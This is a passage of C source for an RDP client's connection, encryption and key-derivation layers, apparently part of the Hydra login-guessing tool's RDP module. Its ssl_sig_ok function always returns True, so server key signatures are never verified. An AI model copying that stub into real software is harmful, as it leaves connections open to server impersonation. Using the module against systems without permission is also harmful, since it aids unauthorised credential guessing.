STREAM s; + + s = iso_init(length + 5); + + ber_out_header(s, MCS_CONNECT_INITIAL, length); + ber_out_header(s, BER_TAG_OCTET_STRING, 1); /* calling domain */ + out_uint8(s, 1); + ber_out_header(s, BER_TAG_OCTET_STRING, 1); /* called domain */ + out_uint8(s, 1); + + ber_out_header(s, BER_TAG_BOOLEAN, 1); + out_uint8(s, 0xff); /* upward flag */ + + mcs_out_domain_params(s, 34, 2, 0, 0xffff); /* target params */ + mcs_out_domain_params(s, 1, 1, 1, 0x420); /* min params */ + mcs_out_domain_params(s, 0xffff, 0xfc17, 0xffff, 0xffff); /* max params */ + + ber_out_header(s, BER_TAG_OCTET_STRING, datalen); + out_uint8p(s, mcs_data->data, datalen); + + s_mark_end(s); + iso_send(s); +} + +/* Expect a MCS_CONNECT_RESPONSE message (ASN.1 BER) */ +static BOOL mcs_recv_connect_response(STREAM mcs_data) { + uint8 result; + int length = 0; + STREAM s; + + s = iso_recv(NULL); + if (s == NULL) + return False; + + ber_parse_header(s, MCS_CONNECT_RESPONSE, &length); + + ber_parse_header(s, BER_TAG_RESULT, &length); + in_uint8(s, result); + if (result != 0) { + error("MCS connect: %d\n", result); + return False; + } + + ber_parse_header(s, BER_TAG_INTEGER, &length); + in_uint8s(s, length); /* connect id */ + mcs_parse_domain_params(s); + + ber_parse_header(s, BER_TAG_OCTET_STRING, &length); + + sec_process_mcs_data(s); + /* + if (length > mcs_data->size) + { + error("MCS data length %d, expected %d\n", length, + mcs_data->size); + length = mcs_data->size; + } + + in_uint8a(s, mcs_data->data, length); + mcs_data->p = mcs_data->data; + mcs_data->end = mcs_data->data + length; + */ + return s_check_end(s); +} + +/* Send an EDrq message (ASN.1 PER) */ +static void mcs_send_edrq(void) { + STREAM s; + + s = iso_init(5); + + out_uint8(s, (MCS_EDRQ << 2)); + out_uint16_be(s, 1); /* height */ + out_uint16_be(s, 1); /* interval */ + + s_mark_end(s); + iso_send(s); +} + +/* Send an AUrq message (ASN.1 PER) */ +static void mcs_send_aurq(void) { + STREAM s; + + s = iso_init(1); + + out_uint8(s, (MCS_AURQ << 2)); + + s_mark_end(s); + iso_send(s); +} + +/* Expect a AUcf message (ASN.1 PER) */ +static BOOL mcs_recv_aucf(uint16 * mcs_userid) { + uint8 opcode, result; + STREAM s; + + s = iso_recv(NULL); + if (s == NULL) + return False; + + in_uint8(s, opcode); + if ((opcode >> 2) != MCS_AUCF) { + error("expected AUcf, got %d\n", opcode); + return False; + } + + in_uint8(s, result); + if (result != 0) { + error("AUrq: %d\n", result); + return False; + } + + if (opcode & 2) + in_uint16_be(s, *mcs_userid); + + return s_check_end(s); +} + +/* Send a CJrq message (ASN.1 PER) */ +static void mcs_send_cjrq(uint16 chanid) { + STREAM s; + + DEBUG_RDP5(("Sending CJRQ for channel #%d\n", chanid)); + + s = iso_init(5); + + out_uint8(s, (MCS_CJRQ << 2)); + out_uint16_be(s, g_mcs_userid); + out_uint16_be(s, chanid); + + s_mark_end(s); + iso_send(s); +} + +/* Expect a CJcf message (ASN.1 PER) */ +static BOOL mcs_recv_cjcf(void) { + uint8 opcode, result; + STREAM s; + + s = iso_recv(NULL); + if (s == NULL) + return False; + + in_uint8(s, opcode); + if ((opcode >> 2) != MCS_CJCF) { + error("expected CJcf, got %d\n", opcode); + return False; + } + + in_uint8(s, result); + if (result != 0) { + error("CJrq: %d\n", result); + return False; + } + + in_uint8s(s, 4); /* mcs_userid, req_chanid */ + if (opcode & 2) + in_uint8s(s, 2); /* join_chanid */ + + return s_check_end(s); +} + +/* Initialise an MCS transport data packet */ +STREAM mcs_init(int length) { + STREAM s; + + s = iso_init(length + 8); + s_push_layer(s, mcs_hdr, 8); + + return s; +} + +/* Send an MCS transport data packet to a specific channel */ +void mcs_send_to_channel(STREAM s, uint16 channel) { + uint16 length; + + s_pop_layer(s, mcs_hdr); + length = s->end - s->p - 8; + length |= 0x8000; + + out_uint8(s, (MCS_SDRQ << 2)); + out_uint16_be(s, g_mcs_userid); + out_uint16_be(s, channel); + out_uint8(s, 0x70); /* flags */ + out_uint16_be(s, length); + + iso_send(s); +} + +/* Send an MCS transport data packet to the global channel */ +void mcs_send(STREAM s) { + mcs_send_to_channel(s, MCS_GLOBAL_CHANNEL); +} + +/* Receive an MCS transport data packet */ +STREAM mcs_recv(uint16 * channel, uint8 * rdpver) { + uint8 opcode, appid, length; + STREAM s; + + s = iso_recv(rdpver); + if (s == NULL) + return NULL; + if (rdpver != NULL) + if (*rdpver != 3) + return s; + in_uint8(s, opcode); + appid = opcode >> 2; + if (appid != MCS_SDIN) { + if (appid != MCS_DPUM) { + error("expected data, got %d\n", opcode); + } + return NULL; + } + in_uint8s(s, 2); /* userid */ + in_uint16_be(s, *channel); + in_uint8s(s, 1); /* flags */ + in_uint8(s, length); + if (length & 0x80) + in_uint8s(s, 1); /* second byte of length */ + return s; +} + +BOOL mcs_connect(char *server, STREAM mcs_data, char *username, BOOL reconnect) { + if (!iso_connect(server, username, reconnect)) + return False; + mcs_send_connect_initial(mcs_data); + if (!mcs_recv_connect_response(mcs_data)) + goto error; + mcs_send_edrq(); + mcs_send_aurq(); + if (!mcs_recv_aucf(&g_mcs_userid)) + goto error; + mcs_send_cjrq(g_mcs_userid + MCS_USERCHANNEL_BASE); + if (!mcs_recv_cjcf()) + goto error; + mcs_send_cjrq(MCS_GLOBAL_CHANNEL); + if (!mcs_recv_cjcf()) + goto error; + return True; +error: + iso_disconnect(); + return False; +} + +/* Disconnect from the MCS layer */ +void mcs_disconnect(void) { + iso_disconnect(); +} + +/* reset the state of the mcs layer */ +void mcs_reset_state(void) { + g_mcs_userid = 0; + iso_reset_state(); +} + +/* Send a self-contained ISO PDU */ +static void iso_send_msg(uint8 code) { + STREAM s; + + s = tcp_init(11); + + out_uint8(s, 3); /* version */ + out_uint8(s, 0); /* reserved */ + out_uint16_be(s, 11); /* length */ + + out_uint8(s, 6); /* hdrlen */ + out_uint8(s, code); + out_uint16(s, 0); /* dst_ref */ + out_uint16(s, 0); /* src_ref */ + out_uint8(s, 0); /* class */ + + s_mark_end(s); + tcp_send(s); +} + +static void iso_send_connection_request(char *username) { + STREAM s; + int length = 30 + strlen(username); + + s = tcp_init(length); + + out_uint8(s, 3); /* version */ + out_uint8(s, 0); /* reserved */ + out_uint16_be(s, length); /* length */ + + out_uint8(s, length - 5); /* hdrlen */ + out_uint8(s, ISO_PDU_CR); + out_uint16(s, 0); /* dst_ref */ + out_uint16(s, 0); /* src_ref */ + out_uint8(s, 0); /* class */ + + out_uint8p(s, "Cookie: mstshash=", strlen("Cookie: mstshash=")); + out_uint8p(s, username, strlen(username)); + + out_uint8(s, 0x0d); /* Unknown */ + out_uint8(s, 0x0a); /* Unknown */ + + s_mark_end(s); + tcp_send(s); +} + +/* Send a single input event fast JL, this is required for win8 */ +void rdp_send_fast_input_kbd(uint32 time, uint16 flags, uint16 param1) { + STREAM s; + uint8 fast_flags = 0; + uint8 len = 4; + + fast_flags |= (flags & RDP_KEYRELEASE) ? FASTPATH_INPUT_KBDFLAGS_RELEASE : 0; + s = tcp_init(len); + out_uint8(s, (1 << 2)); //one event + out_uint8(s, len); + out_uint8(s, fast_flags | (FASTPATH_INPUT_EVENT_SCANCODE << 5)); + out_uint8(s, param1); + s_mark_end(s); + tcp_send(s); +} + +/* Send a single input event fast JL, this is required for win8 */ +void rdp_send_fast_input_mouse(uint32 time, uint16 flags, uint16 param1, uint16 param2) { + STREAM s; + uint8 len = 9; + + s = tcp_init(len); + out_uint8(s, (1 << 2)); //one event + out_uint8(s, len); + out_uint8(s, (FASTPATH_INPUT_EVENT_MOUSE << 5)); + out_uint16(s, flags); + out_uint16(s, param1); + out_uint16(s, param2); + s_mark_end(s); + tcp_send(s); +} + + +/* Receive a message on the ISO layer, return code */ +static STREAM iso_recv_msg(uint8 * code, uint8 * rdpver) { + STREAM s; + uint16 length; + uint8 version; + + s = tcp_recv(NULL, 4); + if (s == NULL) + return NULL; + in_uint8(s, version); + if (rdpver != NULL) + *rdpver = version; + if (version == 3) { + in_uint8s(s, 1); /* pad */ + in_uint16_be(s, length); + } else { + in_uint8(s, length); + if (length & 0x80) { + length &= ~0x80; + next_be(s, length); + } + } + if (length < 5) { + error("Bad packet header\n"); + return NULL; + } + s = tcp_recv(s, length - 4); + if (s == NULL) + return NULL; + if (version != 3) + return s; + in_uint8s(s, 1); /* hdrlen */ + in_uint8(s, *code); + if (*code == ISO_PDU_DT) { + in_uint8s(s, 1); /* eot */ + return s; + } + in_uint8s(s, 5); /* dst_ref, src_ref, class */ + return s; +} + +/* Initialise ISO transport data packet */ +STREAM iso_init(int length) { + STREAM s; + + s = tcp_init(length + 7); + s_push_layer(s, iso_hdr, 7); + + return s; +} + +/* Send an ISO data PDU */ +void iso_send(STREAM s) { + uint16 length; + + s_pop_layer(s, iso_hdr); + length = s->end - s->p; + + out_uint8(s, 3); /* version */ + out_uint8(s, 0); /* reserved */ + out_uint16_be(s, length); + + out_uint8(s, 2); /* hdrlen */ + out_uint8(s, ISO_PDU_DT); /* code */ + out_uint8(s, 0x80); /* eot */ + + tcp_send(s); +} + +/* Receive ISO transport data packet */ +STREAM iso_recv(uint8 * rdpver) { + STREAM s; + uint8 code = 0; + + s = iso_recv_msg(&code, rdpver); + if (s == NULL) + return NULL; + if (rdpver != NULL) + if (*rdpver != 3) + return s; + if (code != ISO_PDU_DT) { + error("expected DT, got 0x%x\n", code); + return NULL; + } + return s; +} + +/* Establish a connection up to the ISO layer */ +BOOL iso_connect(char *server, char *username, BOOL reconnect) { + uint8 code = 0; + + if (reconnect) { + iso_send_msg(ISO_PDU_CR); + } else { + iso_send_connection_request(username); + } + if (iso_recv_msg(&code, NULL) == NULL) { + return False; + } + if (code != ISO_PDU_CC) { + error("expected CC, got 0x%x\n", code); + hydra_disconnect(g_sock); + return False; + } + + return True; +} + +/* Disconnect from the ISO layer */ +void iso_disconnect(void) { + iso_send_msg(ISO_PDU_DR); + g_sock = hydra_disconnect(g_sock); +} + +/* reset the state to support reconnecting */ +void iso_reset_state(void) { + tcp_reset_state(); +} + +static int g_rc4_key_len; +static SSL_RC4 g_rc4_decrypt_key; +static SSL_RC4 g_rc4_encrypt_key; +static uint32 g_server_public_key_len; + +static uint8 g_sec_sign_key[16]; +static uint8 g_sec_decrypt_key[16]; +static uint8 g_sec_encrypt_key[16]; +static uint8 g_sec_decrypt_update_key[16]; +static uint8 g_sec_encrypt_update_key[16]; +static uint8 g_sec_crypted_random[SEC_MAX_MODULUS_SIZE]; + +uint16 g_server_rdp_version = 0; + +/* These values must be available to reset state - Session Directory */ +static int g_sec_encrypt_use_count = 0; +static int g_sec_decrypt_use_count = 0; + + +void ssl_sha1_init(SSL_SHA1 * sha1) { + SHA1_Init(sha1); +} + +void ssl_sha1_update(SSL_SHA1 * sha1, uint8 * data, uint32 len) { + SHA1_Update(sha1, data, len); +} + +void ssl_sha1_final(SSL_SHA1 * sha1, uint8 * out_data) { + SHA1_Final(out_data, sha1); +} + +void ssl_md5_init(SSL_MD5 * md5) { + MD5_Init(md5); +} + +void ssl_md5_update(SSL_MD5 * md5, uint8 * data, uint32 len) { + MD5_Update(md5, data, len); +} + +void ssl_md5_final(SSL_MD5 * md5, uint8 * out_data) { + MD5_Final(out_data, md5); +} + +void ssl_rc4_set_key(SSL_RC4 * rc4, uint8 * key, uint32 len) { + RC4_set_key(rc4, len, key); +} + +void ssl_rc4_crypt(SSL_RC4 * rc4, uint8 * in_data, uint8 * out_data, uint32 len) { + RC4(rc4, len, in_data, out_data); +} + +static void reverse(uint8 * p, int len) { + int i, j; + uint8 temp; + + for (i = 0, j = len - 1; i < j; i++, j--) { + temp = p[i]; + p[i] = p[j]; + p[j] = temp; + } +} + +void ssl_rsa_encrypt(uint8 * out, uint8 * in, int len, uint32 modulus_size, uint8 * modulus, uint8 * exponent) { + BN_CTX *ctx; + BIGNUM mod, exp, x, y; + uint8 inr[SEC_MAX_MODULUS_SIZE]; + int outlen; + + reverse(modulus, modulus_size); + reverse(exponent, SEC_EXPONENT_SIZE); + memcpy(inr, in, len); + reverse(inr, len); + + ctx = BN_CTX_new(); + BN_init(&mod); + BN_init(&exp); + BN_init(&x); + BN_init(&y); + + BN_bin2bn(modulus, modulus_size, &mod); + BN_bin2bn(exponent, SEC_EXPONENT_SIZE, &exp); + BN_bin2bn(inr, len, &x); + BN_mod_exp(&y, &x, &exp, &mod, ctx); + outlen = BN_bn2bin(&y, out); + reverse(out, outlen); + if (outlen < (int) modulus_size) + memset(out + outlen, 0, modulus_size - outlen); + + BN_free(&y); + BN_clear_free(&x); + BN_free(&exp); + BN_free(&mod); + BN_CTX_free(ctx); +} + +/* returns newly allocated SSL_CERT or NULL */ +SSL_CERT *ssl_cert_read(uint8 * data, uint32 len) { + /* this will move the data pointer but we don't care, we don't use it again */ + return d2i_X509(NULL, (D2I_X509_CONST unsigned char **) &data, len); +} + +void ssl_cert_free(SSL_CERT * cert) { + X509_free(cert); +} + +/* returns newly allocated SSL_RKEY or NULL */ +SSL_RKEY *ssl_cert_to_rkey(SSL_CERT * cert, uint32 * key_len) { + EVP_PKEY *epk = NULL; + SSL_RKEY *lkey; + int nid; + + /* By some reason, Microsoft sets the OID of the Public RSA key to + the oid for "MD5 with RSA Encryption" instead of "RSA Encryption" + + Kudos to Richard Levitte for the following (. intiutive .) + lines of code that resets the OID and let's us extract the key. */ + nid = OBJ_obj2nid(cert->cert_info->key->algor->algorithm); + if ((nid == NID_md5WithRSAEncryption) || (nid == NID_shaWithRSAEncryption)) { + DEBUG_RDP5(("Re-setting algorithm type to RSA in server certificate\n")); + ASN1_OBJECT_free(cert->cert_info->key->algor->algorithm); + cert->cert_info->key->algor->algorithm = OBJ_nid2obj(NID_rsaEncryption); + } + epk = X509_get_pubkey(cert); + if (NULL == epk) { + error("Failed to extract public key from certificate\n"); + return NULL; + } + + lkey = RSAPublicKey_dup(EVP_PKEY_get1_RSA(epk)); + EVP_PKEY_free(epk); + *key_len = RSA_size(lkey); + return lkey; +} + +int ssl_cert_print_fp(FILE * fp, SSL_CERT * cert) { + return X509_print_fp(fp, cert); +} + +void ssl_rkey_free(SSL_RKEY * rkey) { + RSA_free(rkey); +} + +/* returns error */ +int ssl_rkey_get_exp_mod(SSL_RKEY * rkey, uint8 * exponent, uint32 max_exp_len, uint8 * modulus, uint32 max_mod_len) { + int len; + + if ((BN_num_bytes(rkey->e) > (int) max_exp_len) || (BN_num_bytes(rkey->n) > (int) max_mod_len)) { + return 1; + } + len = BN_bn2bin(rkey->e, exponent); + reverse(exponent, len); + len = BN_bn2bin(rkey->n, modulus); + reverse(modulus, len); + return 0; +} + +/* returns boolean */ +BOOL ssl_sig_ok(uint8 * exponent, uint32 exp_len, uint8 * modulus, uint32 mod_len, uint8 * signature, uint32 sig_len) { + return True; +} + + +void ssl_hmac_md5(const void *key, int key_len, const unsigned char *msg, int msg_len, unsigned char *md) { + HMAC_CTX ctx; + + HMAC_CTX_init(&ctx); + HMAC(EVP_md5(), key, key_len, msg, msg_len, md, NULL); + HMAC_CTX_cleanup(&ctx); +} + + +/* + * I believe this is based on SSLv3 with the following differences: + * MAC algorithm (5.2.3.1) uses only 32-bit length in place of seq_num/type/length fields + * MAC algorithm uses SHA1 and MD5 for the two hash functions instead of one or other + * key_block algorithm (6.2.2) uses 'X', 'YY', 'ZZZ' instead of 'A', 'BB', 'CCC' + * key_block partitioning is different (16 bytes each: MAC secret, decrypt key, encrypt key) + * encryption/decryption keys updated every 4096 packets + * See http://wp.netscape.com/eng/ssl3/draft302.txt + */ + +/* + * 48-byte transformation used to generate master secret (6.1) and key material (6.2.2). + * Both SHA1 and MD5 algorithms are used. + */ +void sec_hash_48(uint8 * out, uint8 * in, uint8 * salt1, uint8 * salt2, uint8 salt) { + uint8 shasig[20]; + uint8 pad[4]; + SSL_SHA1 sha1; + SSL_MD5 md5; + int i; + + for (i = 0; i < 3; i++) { + memset(pad, salt + i, i + 1); + + ssl_sha1_init(&sha1); + ssl_sha1_update(&sha1, pad, i + 1); + ssl_sha1_update(&sha1, in, 48); + ssl_sha1_update(&sha1, salt1, 32); + ssl_sha1_update(&sha1, salt2, 32); + ssl_sha1_final(&sha1, shasig); + + ssl_md5_init(&md5); + ssl_md5_update(&md5, in, 48); + ssl_md5_update(&md5, shasig, 20); + ssl_md5_final(&md5, &out[i * 16]); + } +} + +/* + * 16-byte transformation used to generate export keys (6.2.2). + */ +void sec_hash_16(uint8 * out, uint8 * in, uint8 * salt1, uint8 * salt2) { + SSL_MD5 md5; + + ssl_md5_init(&md5); + ssl_md5_update(&md5, in, 16); + ssl_md5_update(&md5, salt1, 32); + ssl_md5_update(&md5, salt2, 32); + ssl_md5_final(&md5, out); +} + +/* Reduce key entropy from 64 to 40 bits */ +static void sec_make_40bit(uint8 * key) { + key[0] = 0xd1; + key[1] = 0x26; + key[2] = 0x9e; +} + +/* Generate encryption keys given client and server randoms */ +static void sec_generate_keys(uint8 * client_random, uint8 * server_random, int rc4_key_size) { + uint8 pre_master_secret[48]; + uint8 master_secret[48]; + uint8 key_block[48]; + + /* Construct pre-master secret */ + memcpy(pre_master_secret, client_random, 24); + memcpy(pre_master_secret + 24, server_random, 24); + + /* Generate master secret and then key material */ + sec_hash_48(master_secret, pre_master_secret, client_random, server_random, 'A'); + sec_hash_48(key_block, master_secret, client_random, server_random, 'X'); + + /* First 16 bytes of key material is MAC secret */ + memcpy(g_sec_sign_key, key_block, 16); + + /* Generate export keys from next two blocks of 16 bytes */ + sec_hash_16(g_sec_decrypt_key, &key_block[16], client_random, server_random); + sec_hash_16(g_sec_encrypt_key, &key_block[32], client_random, server_random); + + if (rc4_key_size == 1) { + DEBUG(("40-bit encryption enabled\n")); + sec_make_40bit(g_sec_sign_key); + sec_make_40bit(g_sec_decrypt_key); + sec_make_40bit(g_sec_encrypt_key); + g_rc4_key_len = 8; + } else { + DEBUG(("rc_4_key_size == %d, 128-bit encryption enabled\n", rc4_key_size)); + g_rc4_key_len = 16; + } + + /* Save initial RC4 keys as update keys */ + memcpy(g_sec_decrypt_update_key, g_sec_decrypt_key, 16); + memcpy(g_sec_encrypt_update_key, g_sec_encrypt_key, 16); + + /* Initialise RC4 state arrays */ + ssl_rc4_set_key(&g_rc4_decrypt_key, g_sec_decrypt_key, g_rc4_key_len); + ssl_rc4_set_key(&g_rc4_encrypt_key, g_sec_encrypt_key, g_rc4_key_len); +} + +static uint8 pad_54[40] = { + 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, + 54, 54, 54, + 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, + 54, 54, 54 +}; + +static uint8 pad_92[48] = { + 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, + 92, 92, 92, 92, 92, 92, 92, + 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, + 92, 92, 92, 92, 92, 92, 92 +}; + +/* Output a uint32 into a buffer (little-endian) */ +void buf_out_uint32(uint8 * buffer, uint32 value) { + buffer[0] = (value) & 0xff; + buffer[1] = (value >> 8) & 0xff; + buffer[2] = (value >> 16) & 0xff; + buffer[3] = (value >> 24) & 0xff; +} + +/* Generate a MAC hash (5.2.3.1), using a combination of SHA1 and MD5 */ +void sec_sign(uint8 * signature, int siglen, uint8 * session_key, int keylen, uint8 * data, int datalen) { + uint8 shasig[20]; + uint8 md5sig[16]; + uint8 lenhdr[4]; + SSL_SHA1 sha1; + SSL_MD5 md5; + + buf_out_uint32(lenhdr, datalen); + + ssl_sha1_init(&sha1); + ssl_sha1_update(&sha1, session_key, keylen); + ssl_sha1_update(&sha1, pad_54, 40); + ssl_sha1_update(&sha1, lenhdr, 4); + ssl_sha1_update(&sha1, data, datalen); + ssl_sha1_final(&sha1, shasig); + + ssl_md5_init(&md5); + ssl_md5_update(&md5, session_key, keylen); + ssl_md5_update(&md5, pad_92, 48); + ssl_md5_update(&md5, shasig, 20); + ssl_md5_final(&md5, md5sig); + + memcpy(signature, md5sig, siglen); +} + +/* Update an encryption key */ +static void sec_update(uint8 * key, uint8 * update_key) { + uint8 shasig[20]; + SSL_SHA1 sha1; + SSL_MD5 md5; + SSL_RC4 update; + + ssl_sha1_init(&sha1); + ssl_sha1_update(&sha1, update_key, g_rc4_key_len); + ssl_sha1_update(&sha1, pad_54, 40); + ssl_sha1_update(&sha1, key, g_rc4_key_len); + ssl_sha1_final(&sha1, shasig); + + ssl_md5_init(&md5); + ssl_md5_update(&md5, update_key, g_rc4_key_len); + ssl_md5_update(&md5, pad_92, 48); + ssl_md5_update(&md5, shasig, 20); + ssl_md5_final(&md5, key); + + ssl_rc4_set_key(&update, key, g_rc4_key_len); + ssl_rc4_crypt(&update, key, key, g_rc4_key_len); + + if (g_rc4_key_len == 8) + sec_make_40bit(key); +} + +/* Encrypt data using RC4 */ +static void sec_encrypt(uint8 * data, int length) { + if (g_sec_encrypt_use_count == 4096) { + sec_update(g_sec_encrypt_key, g_sec_encrypt_update_key); + ssl_rc4_set_key(&g_rc4_encrypt_key, g_sec_encrypt_key, g_rc4_key_len); + g_sec_encrypt_use_count = 0; + } + + ssl_rc4_crypt(&g_rc4_encrypt_key, data, data, length); + g_sec_encrypt_use_count++; +} + +/* Decrypt data using RC4 */ +void sec_decrypt(uint8 * data, int length) { + if (g_sec_decrypt_use_count == 4096) { + sec_update(g_sec_decrypt_key, g_sec_decrypt_update_key); + ssl_rc4_set_key(&g_rc4_decrypt_key, g_sec_decrypt_key, g_rc4_key_len); + g_sec_decrypt_use_count = 0; + } + + ssl_rc4_crypt(&g_rc4_decrypt_key, data, data, length); + g_sec_decrypt_use_count++; +} + +/* Perform an RSA public key encryption operation */ +static void sec_rsa_encrypt(uint8 * out, uint8 * in, int len, uint32 modulus_size, uint8 * modulus, uint8 * exponent) { + ssl_rsa_encrypt(out, in, len, modulus_size, modulus, exponent); +} + +/* Initialise secure transport packet */ +STREAM sec_init(uint32 flags, int maxlen) { + int hdrlen; + STREAM s; + +// if (!g_licence_issued) + hdrlen = (flags & SEC_ENCRYPT) ? 12 : 4; +// else + +// hdrlen = (flags & SEC_ENCRYPT) ? 12 : 0; + s = mcs_init(maxlen + hdrlen); + s_push_layer(s, sec_hdr, hdrlen); + + return s; +} + +/* Transmit secure transport packet over specified channel */ +void sec_send_to_channel(STREAM s, uint32 flags, uint16 channel) { + int datalen; + + s_pop_layer(s, sec_hdr); + out_uint32_le(s, flags); + + if (flags & SEC_ENCRYPT) { + flags &= ~SEC_ENCRYPT; + datalen = s->end - s->p - 8; + + sec_sign(s->p, 8, g_sec_sign_key, g_rc4_key_len, s->p + 8, datalen); + sec_encrypt(s->p + 8, datalen); + } + + mcs_send_to_channel(s, channel); +} + +/* Transmit secure transport packet */ + +void sec_send(STREAM s, uint32 flags) { + sec_send_to_channel(s, flags, MCS_GLOBAL_CHANNEL); +} + + +/* Transfer the client random to the server */ +static void sec_establish_key(void) { + uint32 length = g_server_public_key_len + SEC_PADDING_SIZE; + uint32 flags = SEC_CLIENT_RANDOM; + STREAM s; + + s = sec_init(flags, length + 4); + + out_uint32_le(s, length); + out_uint8p(s, g_sec_crypted_random, g_server_public_key_len); + out_uint8s(s, SEC_PADDING_SIZE); + + s_mark_end(s); + sec_send(s, flags); +} + +/* Output a string in Unicode */ +void rdp_out_unistr(STREAM s, char *string, int len) { + int i = 0, j = 0; + + len += 2; + while (i < len) { + s->p[i++] = string[j++]; + s->p[i++] = 0; + } + s->p += len; +} + +/* Output connect initial data blob */ +static void sec_out_mcs_data(STREAM s) { + char *g_hostname = "hydra"; + int hostlen = 2 * strlen(g_hostname); + int length = 158 + 76 + 12 + 4; + +/* + if (g_num_channels > 0) + length += g_num_channels * 12 + 8; +*/ + if (hostlen > 30) + hostlen = 30; + + /* Generic Conference Control (T.124) ConferenceCreateRequest */ + out_uint16_be(s, 5); + out_uint16_be(s, 0x14); + out_uint8(s, 0x7c); + out_uint16_be(s, 1); + + out_uint16_be(s, (length | 0x8000)); /* remaining length */ + + out_uint16_be(s, 8); /* length? */ + out_uint16_be(s, 16); + out_uint8(s, 0); + out_uint16_le(s, 0xc001); + out_uint8(s, 0); + + out_uint32_le(s, 0x61637544); /* OEM ID: "Duca", as in Ducati. */ + out_uint16_be(s, ((length - 14) | 0x8000)); /* remaining length */ + + /* Client information */ + out_uint16_le(s, SEC_TAG_CLI_INFO); + out_uint16_le(s, 212); /* length */ + out_uint16_le(s, g_use_rdp5 ? 4 : 1); /* RDP version. 1 == RDP4, 4 == RDP5. */ + out_uint16_le(s, 8); + out_uint16_le(s, 800); + out_uint16_le(s, 600); + out_uint16_le(s, 0xca01); + out_uint16_le(s, 0xaa03); + out_uint32_le(s, 0x409); + out_uint32_le(s, 2600); /* Client build. We are now 2600 compatible :-) */ + + /* Unicode name of client, padded to 32 bytes */ + rdp_out_unistr(s, g_hostname, hostlen); + out_uint8s(s, 30 - hostlen); + + /* See + http://msdn.microsoft.com/library/default.asp?url=/library/en-us/wceddk40/html/cxtsksupportingremotedesktopprotocol.asp */ + out_uint32_le(s, 0x4); + out_uint32_le(s, 0x0); + out_uint32_le(s, 0xc); + out_uint8s(s, 64); /* reserved? 4 + 12 doublewords */ + out_uint16_le(s, 0xca01); /* colour depth? */ + out_uint16_le(s, 1); + + out_uint32(s, 0); + out_uint8(s, g_server_depth); + out_uint16_le(s, 0x0700); + out_uint8(s, 0); + out_uint32_le(s, 1); + out_uint8s(s, 64); /* End of client info */ + + out_uint16_le(s, SEC_TAG_CLI_4); + out_uint16_le(s, 12); + out_uint32_le(s, g_console_session ? 0xb : 9); + out_uint32(s, 0); + + /* Client encryption settings */ + out_uint16_le(s, SEC_TAG_CLI_CRYPT); + out_uint16_le(s, 12); /* length */ + out_uint32_le(s, g_encryption ? 0x3 : 0); /* encryption supported, 128-bit supported */ + out_uint32(s, 0); /* Unknown */ + +/* + DEBUG_RDP5(("g_num_channels is %d\n", g_num_channels)); + if (g_num_channels > 0) + { + out_uint16_le(s, SEC_TAG_CLI_CHANNELS); + out_uint16_le(s, g_num_channels * 12 + 8); // length + out_uint32_le(s, g_num_channels); // number of virtual channels + for (i = 0; i < g_num_channels; i++) + { + DEBUG_RDP5(("Requesting channel %s\n", g_channels[i].name)); + out_uint8a(s, g_channels[i].name, 8); + out_uint32_be(s, g_channels[i].flags); + } + } +*/ + s_mark_end(s); +} + +/* Parse a public key structure */ +static BOOL sec_parse_public_key(STREAM s, uint8 * modulus, uint8 * exponent) { + uint32 magic, modulus_len; + + in_uint32_le(s, magic); + + if (magic != SEC_RSA_MAGIC) { + error("RSA magic 0x%x\n", magic); + return False; + } + + in_uint32_le(s, modulus_len); + modulus_len -= SEC_PADDING_SIZE; + if ((modulus_len < SEC_MODULUS_SIZE) || (modulus_len > SEC_MAX_MODULUS_SIZE)) { + error("Bad server public key size (%u bits)\n", modulus_len * 8); + return False; + } + + in_uint8s(s, 8); /* modulus_bits, unknown */ + in_uint8a(s, exponent, SEC_EXPONENT_SIZE); + in_uint8a(s, modulus, modulus_len); + in_uint8s(s, SEC_PADDING_SIZE); + g_server_public_key_len = modulus_len; + + return s_check(s); +} + +/* Parse a public signature structure */ +static BOOL sec_parse_public_sig(STREAM s, uint32 len, uint8 * modulus, uint8 * exponent) { + uint8 signature[SEC_MAX_MODULUS_SIZE]; + uint32 sig_len; + + if (len != 72) { + return True; + } + memset(signature, 0, sizeof(signature)); + sig_len = len - 8; + in_uint8a(s, signature, sig_len); + return ssl_sig_ok(exponent, SEC_EXPONENT_SIZE, modulus, g_server_public_key_len, signature, sig_len); +} + +/* Parse a crypto information structure */ +static BOOL sec_parse_crypt_info(STREAM s, uint32 * rc4_key_size, uint8 ** server_random, uint8 * modulus, uint8 * exponent) { + uint32 crypt_level, random_len, rsa_info_len; + uint32 cacert_len, cert_len, flags; + SSL_CERT *cacert, *server_cert; + SSL_RKEY *server_public_key; + uint16 tag, length; + uint8 *next_tag, *end; + + in_uint32_le(s, *rc4_key_size); /* 1 = 40-bit, 2 = 128-bit */ + in_uint32_le(s, crypt_level); /* 1 = low, 2 = medium, 3 = high */ + if (crypt_level == 0) /* no encryption */ + return False; + in_uint32_le(s, random_len); + in_uint32_le(s, rsa_info_len); + + if (random_len != SEC_RANDOM_SIZE) { + error("random len %d, expected %d\n", random_len, SEC_RANDOM_SIZE); + return False; + } + + in_uint8p(s, *server_random, random_len); + + /* RSA info */ + end = s->p + rsa_info_len; + if (end > s->end) + return False; + + in_uint32_le(s, flags); /* 1 = RDP4-style, 0x80000002 = X.509 */ + if (flags & 1) { + DEBUG_RDP5(("We're going for the RDP4-style encryption\n")); + in_uint8s(s, 8); /* unknown */ + + while (s->p < end) { + in_uint16_le(s, tag); + in_uint16_le(s, length); + + next_tag = s->p + length; + + switch (tag) { + case SEC_TAG_PUBKEY: + if (!sec_parse_public_key(s, modulus, exponent)) + return False; + DEBUG_RDP5(("Got Public key, RDP4-style\n")); + + break; + + case SEC_TAG_KEYSIG: + if (!sec_parse_public_sig(s, length, modulus, exponent)) + return False; + break; + + default: + unimpl("crypt tag 0x%x\n", tag); + } + + s->p = next_tag; + } + } else { + uint32 certcount; + + DEBUG_RDP5(("We're going for the RDP5-style encryption\n")); + in_uint32_le(s, certcount); /* Number of certificates */ + if (certcount < 2) { + error("Server didn't send enough X509 certificates\n"); + return False; + } + for (; certcount > 2; certcount--) { /* ignore all the certificates between the root and the signing CA */ + uint32 ignorelen; + SSL_CERT *ignorecert; + + DEBUG_RDP5(("Ignored certs left: %d\n", certcount)); + 